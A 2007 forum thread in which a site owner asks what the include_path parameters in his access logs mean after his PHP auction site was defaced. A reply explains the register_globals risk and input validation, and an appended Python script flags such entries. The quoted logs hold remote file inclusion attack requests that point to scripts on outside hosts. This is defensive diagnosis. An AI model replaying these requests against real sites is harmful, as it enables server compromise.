Re: Effect of "include_path" on URL of PHP script

Posted by Jerry Stuckle on 10/16/07 02:42

Charles Crume wrote:
> Hi Jerry;
>
> Thanks!!!
>
> I am using an auction software package that *requires* register_globals to be
> enabled. I took a look at my PHP.INI file and saw where I had changed this
> setting years ago (had put some comments as to what, why, and when the
> change was made in the file).
>
> I have turned register_globals off (of course the auction software no longer
> works) until I figure out what to do.
>
> Thanks again for your help!
>
> Charles...
>
>
>
>
> "Jerry Stuckle" <jstucklex@attglobal.net> wrote in message
> news:D7-dnQ0RJ6npTY_anZ2dnUVZ_gOdnZ2d@comcast.com...
>> Charles Crume wrote:
>>> Hello Everyone;
>>>
>>> My site was hacked the other day -- someone was able to rename my
>>> index.shtml file and put their own index.html file on my server. Not sure
>>> how it was done, but looking through the log file, I found lots and
>>> lots of entries where an "include_path" parameter was included in the URL
>>> of the PHP page, as shown below:
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1"
>>> 404 310 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1"
>>> 404 310 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>>> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>>> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>>> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>>
>>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>>> what the effect of including it in the URL is. A number of entries show a
>>> code 404 as the culprits are obviously phishing for pages, but requests
>>> with return code 200 are showing a large number of bytes transferred --
>>> far larger than the PHP page itself.
>>>
>>> Can someone explain what adding "include_path" to a URL does?
>>>
>>> Is there something I need to check on my server in how I've got Apache
>>> configured?
>>>
>>> TIA.
>>>
>>> Charles...
>>>
>>>
>>>
>> The include_path itself in the url is just a variable. It's what you do
>> with it that's important. For instance, if you have register_globals
>> enabled, the include_path in the URL may override the system include_path.
>>
>> Or, depending on what else you do in your code. This is a big reason why
>> it's good to use $_POST instead of $_REQUEST if you're posting a form to a
>> page - $_POST will ignore any $_GET parameters.
>>
>> And just another reason to *ALWAYS* validate data coming from the user.
>>
>> --
>> ==================
>> Remove the "x" from my email address
>> Jerry Stuckle
>> JDS Computer Training Corp.
>> jstucklex@attglobal.net
>> ==================
>>
>
>
>

If your software is so old that it requires register_globals, it
probably has other security holes, also.

If they don't have an upgraded version, I'd suggest you find another
package. Otherwise, chances are you'll have this happen again.
Especially since they now know you're vulnerable.

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================
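As an added example (not code from this thread), a small Python triage script for the kind of access-log entries quoted above: it parses Apache combined-format lines, flags any query parameter whose value is a remote URL (the register_globals/include_path pattern Jerry describes), and separates 200 responses, where the include most likely executed, from 404 probes. The log lines embedded below are constructed with reserved example addresses, not the ones from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the post's log entries (not the originals).
SAMPLE_LOG = """\
192.0.2.10 - - [11/Oct/2007:15:07:38 -0400] "GET /auction/includes/settings.inc.php?include_path=http://attacker.example/echo.txt? HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
192.0.2.10 - - [11/Oct/2007:15:48:13 -0400] "GET /includes/setting.inc.php?include_path=http://attacker.example/echo.txt? HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
198.51.100.7 - - [11/Oct/2007:16:02:01 -0400] "GET /auction/item.php?id=268 HTTP/1.1" 200 56446 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Any name=value pair whose value is a remote URL. Scanning the raw target (rather
# than a proper query parse) also catches the "id=268/file.php?include_path=http://..."
# shape from the post, where the parameter hides behind a second '?'.
REMOTE_PARAM_RE = re.compile(r'([A-Za-z0-9_.\[\]-]+)=((?:https?|ftp)://[^&\s"]+)')


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_remote_includes(line):
    """List (parameter, url) pairs where a request parameter carries a remote URL."""
    rec = parse_line(line)
    if rec is None:
        return []
    return REMOTE_PARAM_RE.findall(unquote(rec["target"]))


def triage(log_text):
    """Flag remote-include attempts; a 200 means the script ran with that value."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = find_remote_includes(line)
        if not hits:
            continue
        status = int(rec["status"])
        findings.append({
            "ip": rec["ip"], "status": status, "bytes": rec["bytes"],
            "params": hits, "ua": rec["ua"],
            # 200 with a remote include is the case to treat as a compromise, not a probe
            "severity": "likely-executed" if status == 200 else "probe",
        })
    return findings
```

Run `triage` over a real access log to list the hosts and parameters involved; a 200 with a large byte count, as in the post, is the entry to investigate first.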
